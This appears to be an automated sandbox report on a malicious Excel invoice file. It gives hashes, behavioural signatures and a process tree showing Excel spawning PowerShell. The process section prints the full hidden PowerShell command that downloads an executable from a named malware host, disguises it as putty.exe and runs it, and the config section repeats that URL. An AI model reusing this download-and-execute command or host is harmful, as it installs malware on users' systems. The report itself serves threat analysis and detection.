Analysis
- max time kernel: 130s
- max time network: 136s
- platform: windows7_x64
- resource: win7
- submitted: 11-07-2020 06:07
Static task: static1
Behavioral task: behavioral1
- Sample: INV100720.xlsm
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: INV100720.xlsm
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: INV100720.xlsm
- Size: 399KB
- MD5: 97d1bf3b13839cb70157bbebc2ab1f8c
- SHA1: b12d4e4b14d3b443e1abb9b6a5a9b6b74de2686a
- SHA256: 9a63be97d600c50abdddc22afd998e25ddac5030bcc4846b97cf7e1932eae7b8
- SHA512: 1bf7e0619db7bbf6bdf4a67608f5d74144ee114c769554e15af72bbd027d792f0e68cf36ea4839b6d37bafab14f73a240ef9d5381f83726a147e51a62e533bb0
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: exe.dropper
- URLs: http://comawhimplet.com/nccd.exe
Signatures
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes (description | pid | process | target process):
  PID 1612 wrote to memory of 1804 | 1612 | EXCEL.EXE | powershell.exe
  PID 1612 wrote to memory of 1804 | 1612 | EXCEL.EXE | powershell.exe
  PID 1612 wrote to memory of 1804 | 1612 | EXCEL.EXE | powershell.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes (pid | process):
  1804 | powershell.exe
- Blacklisted process makes network request (1 IoC)
  Processes (flow | pid | process):
  5 | 1804 | powershell.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes (pid | process):
  1804 | powershell.exe
- Office loads VBA resources, possible macro or embedded object present
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes (pid | process):
  1612 | EXCEL.EXE
- Suspicious use of SetWindowsHookEx (3 IoCs)
  Processes (pid | process):
  1612 | EXCEL.EXE
  1612 | EXCEL.EXE
  1612 | EXCEL.EXE
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description | pid | pid_target | process | target process):
  Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 1804 | 1612 | powershell.exe | EXCEL.EXE
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 1804 | powershell.exe
Processes
- C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\INV100720.xlsm
  PID: 1612
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Child process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://comawhimplet.com/nccd.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
    PID: 1804
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Suspicious behavior: GetForegroundWindowSpam
    - Process spawned unexpected child process
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads
- memory/1612-1-0x0000000007320000-0x0000000007420000-memory.dmp (Filesize: 1024KB)
- memory/1612-3-0x0000000007320000-0x0000000007420000-memory.dmp (Filesize: 1024KB)
- memory/1612-4-0x0000000007320000-0x0000000007420000-memory.dmp (Filesize: 1024KB)
- memory/1612-5-0x0000000007320000-0x0000000007420000-memory.dmp (Filesize: 1024KB)
- memory/1804-6-0x0000000000000000-mapping.dmp